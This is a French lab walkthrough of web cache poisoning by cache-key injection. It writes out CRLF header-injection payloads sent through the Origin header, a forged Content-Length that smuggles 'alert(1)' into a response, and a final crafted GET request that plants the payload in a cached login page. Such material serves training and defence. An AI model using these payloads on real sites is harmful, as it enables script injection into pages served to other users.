> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/cache-poisoning/cache-key-injection.md).

# Injection dans la clé de cache

### Injection dans la clé du cache

### Injection dans la clé du cache

Nous devons combiner plusieurs failles (y compris **injection dans la clé du cache**) pour exécuter **`alert(1)`** dans le navigateur de la victime. Le labo nécessite l'utilisation de l'en-tête **`Pragma: x-get-cache-key`**.

<figure><img src="/files/1a3c4192e87a60722453a1c92f11fdfcea355b83" alt=""><figcaption></figcaption></figure>

#### Reconnaissance

1/) Comportement de connexion

* Nous avons un panneau de connexion.
* Après connexion, nous sommes redirigés vers **`/login/?lang=en`**.
* Un cookie de session est ensuite défini.

<figure><img src="/files/124c12f46e9d23910ffde2fee837dd509dd04df2" alt=""><figcaption></figcaption></figure>

2/) Réflexion du `lang` paramètre

* Notre entrée apparaît dans la réponse via `lang`:
* Exemple : **`/login/?lang=HELLLOOOO`**

```bash
/login/?lang=HELLLOOOO
```

<figure><img src="/files/c0a9564fd2791e84ca3fd6b2ee1ef672e77aa711" alt=""><figcaption></figcaption></figure>

Si nous mettons des balises HTML (par ex. `<h1>`), **cela ne s'exécute pas**: il y a un encodage HTML\*\*.

<figure><img src="/files/9819e837018bd0f83fa3b451be735e78628848e4" alt=""><figcaption></figcaption></figure>

#### Point d'entrée opérationnel

Fichier JS caché : `localize.js`

```bash
/js/localize.js?lang=en&cors=0
```

Nous remarquons un script en arrière-plan :

* **`/js/localize.js?lang=en&CORS=0`**
* Réponse observée :
* `document.cookie = 'lang=en';`

Si nous changeons `lang`, la valeur est reflétée :

* **`/js/localize.js?lang=hello&CORS=0`** → `hello` apparaît dans la réponse.

<figure><img src="/files/3d308f2d53fa8f6814d6e85b89efed1c570532c5" alt=""><figcaption></figcaption></figure>

### Observation de la clé de cache

Nous ajoutons :

```http
Pragma: x-get-cache-key
```

Et nous obtenons la clé :

* `X-Cache-Key: /js/localize.js?lang=en&CORS=0$$`

<figure><img src="/files/ce3213fdf4d179dab84014cd54f3af8017ee6df7" alt=""><figcaption></figcaption></figure>

Nous constatons que `CORS` influence la clé, et qu'en jouant **Origin** + `CORS`, nous pouvons faire varier ce qui entre dans le cache.

<figure><img src="/files/42944bd5600d8296ebb2468d6c6c6a1b6f3cb3c6" alt=""><figcaption></figcaption></figure>

### Injection d'en-têtes via Back Cart

Nous utilisons l'injection CRLF :

* `%0d%0a`

```
man ascii
```

<figure><img src="/files/184fec83bdae9f343d498ee1ab773cfdedeab816" alt=""><figcaption></figcaption></figure>

#### 1) Test : injection de cookie

Nous envoyons :

* `Origin: hello%0d%0aSet-Cookie:%20csrfKey=a`

Résultat : le cookie est correctement interprété côté réponse.

<figure><img src="/files/9c2996910fe7a6a74cd8f40142dbfaed2fd48e9f" alt=""><figcaption></figcaption></figure>

#### Injection JavaScript en manipulant `Content-Length`

Nous essayons ensuite d'injecter du contenu dans la réponse avec :

* `Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$`

Dans la réponse, nous trouvons **`alert(1)`**.

<figure><img src="/files/1e3b6c13a816eb0291e9a0a0edbd4bdc1b430882" alt=""><figcaption></figcaption></figure>

#### Construire une réponse cachée ciblée

Pour que le serveur stocke cette version (avec `alert(1)`), la **clé de cache** doit correspondre à une forme qui inclut notre `Origin`, par exemple :

{% code overflow="wrap" %}

```http
X-Cache-Key: /js/localize.js?lang=hello&cors=1$$origin=hello%0d%0aContent-Length: 8%0d%0a%0d%0aalert(1)
```

{% endcode %}

<figure><img src="/files/be0003d3be9b042c22f7af206421eb75cab62d0f" alt=""><figcaption></figcaption></figure>

#### Décalage côté victime via un paramètre ignoré

Nous cherchons un paramètre ignoré par le cache (trouvé avec Param Miner) :

* **`utm_content`**

Nous réutilisons la clé du cache et plaçons la charge utile dans `utm_content` pour servir la ressource empoisonnée lors de la visite de `lang=en`.

Requête finale (telle que nous l'avons utilisée) :

{% code overflow="wrap" %}

```bash
GET /login?lang=en?utm_content=x%26cors=1%26x=1$$origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/2
```

{% endcode %}

<figure><img src="/files/55a69e5f2d259321db6f4a5e5578138ad80244e6" alt=""><figcaption></figcaption></figure>

Lorsque la victime ouvre la page dans **`/login/?lang=en`** (via une redirection), le contenu empoisonné est servi depuis le cache, et **`alert(1)`** s'exécute.

<figure><img src="/files/94e9d589e8d9cc5aabae231e673d45ee663c121c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/cache-poisoning/cache-key-injection.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
